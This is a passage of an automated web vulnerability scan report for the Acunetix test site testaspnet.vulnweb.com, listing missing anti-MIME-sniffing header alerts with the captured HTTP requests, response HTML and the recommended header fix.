          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        4. GET http://testaspnet.vulnweb.com/ads/acunetix.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (333 bytes)
          GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ads/def.html
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:52 GMT
          Accept-Ranges: bytes
          ETag: "eb3686f99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 3048
          
          
          Response body (3048 bytes)
          GIF89a ÷å1:555øõõäääÑÑѪªªÚÚÚiiiúÕÖä*3¯®®
          
          
